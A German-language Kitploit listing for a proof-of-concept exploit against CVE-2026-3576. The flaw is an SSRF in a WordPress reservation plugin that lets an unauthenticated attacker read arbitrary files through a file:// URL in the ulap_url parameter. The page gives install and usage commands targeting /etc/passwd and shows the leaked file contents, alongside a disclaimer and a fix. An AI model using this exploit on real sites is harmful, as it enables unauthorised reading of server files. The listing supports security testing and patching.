Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-3576 — Proof-of-Concept-Exploit für CVE-2026-3576 | Kitploit
Tools/GitHubGitHub/anirbala98/cve-2026-3576
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubanirbala98/cve-2026-3576

CVE-2026-3576

Proof-of-Concept-Exploit für CVE-2026-3576

Repository anzeigen
2113vor 11 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-3576 - Wordpress Plugin Planyo Online Reservation System <= 3.0 - Beliebiger Dateizugriff über SSRF

Dieses Repository enthält einen auf Python basierenden Proof-of-Concept(PoC)-Exploit für CVE-2026-3576. Er ist auch auf Exploit-DB hier zu finden.

Ich habe außerdem ein Metasploit-Modul für diesen Exploit entwickelt, das hier zu finden ist.

Haftungsausschluss

Dieses Projekt dient ausschließlich Bildungszwecken und autorisierten Sicherheitstests. Verwenden Sie es nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine Testberechtigung haben.

Übersicht

Im Planyo Online Reservation System Plugin für WordPress vor Version 3.1 besteht eine Server-Side-Request-Forgery(SSRF)-Schwachstelle. Sie ermöglicht es einem nicht authentifizierten Angreifer, eine file://-URL über den Parameter ulap_url bereitzustellen, was zu beliebigem Dateizugriff führt.

Eine ausführliche Analyse mit Quellcode-Analyse und Exploit-Demonstration finden Sie in meinem Medium-Blog.

Betroffene Version

Tool herunterladen
KomponenteVersion
Verwundbares Plugin<=3.0
Gepatchtes Plugin3.1

Anforderungen

  • Python 3.13.14
  • Requests 2.32.5

Installation

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2026-3576.git
cd CVE-2026-3576/
pip install -r requirements.txt

Verwendung

root@kitploit:~
python exploit.py <base_url> -f <Dateipfad> --disable-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd

Beispiel

root@kitploit:~
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd                             
[*] Prüfe, ob das Ziel verwundbar ist...
[+] Version gefunden: 2.9
[+] Ziel ist verwundbar

[*] Versuche, beliebige Datei zu lesen...

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

Gegenmaßnahmen

Aktualisieren Sie das Plugin auf Version 3.1.

Referenzen

  • https://nvd.nist.gov/vuln/detail/CVE-2026-3576
  • https://www.planyo.com/wordpress-reservation-system/
  • https://plugins.svn.wordpress.org/planyo-online-reservation-system/tags/2.9/
  • https://www.exploit-db.com/exploits/52636
  • https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
  • https://anirbala98.medium.com/from-source-code-to-exploit-understanding-cve-2026-3576-3fa9754bd8d3